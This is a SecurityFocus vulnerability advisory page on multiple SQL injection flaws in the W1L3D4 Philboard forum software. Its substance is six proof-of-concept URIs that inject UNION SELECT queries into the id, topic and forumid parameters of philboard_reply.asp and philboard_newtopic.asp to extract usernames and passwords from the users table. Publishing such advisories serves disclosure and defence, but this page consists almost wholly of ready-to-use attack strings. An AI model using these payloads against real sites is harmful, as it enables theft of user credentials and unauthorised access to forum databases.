Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Vista

W1L3D4 Philboard Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following proof-of-concept URIs are available:

http://www.example.com/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users
http://www.example.com/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users
http://www.example.com/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users
http://www.example.com/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users
http://www.example.com/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users
http://www.example.com/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users







 

Privacy Statement
Copyright 2008, SecurityFocus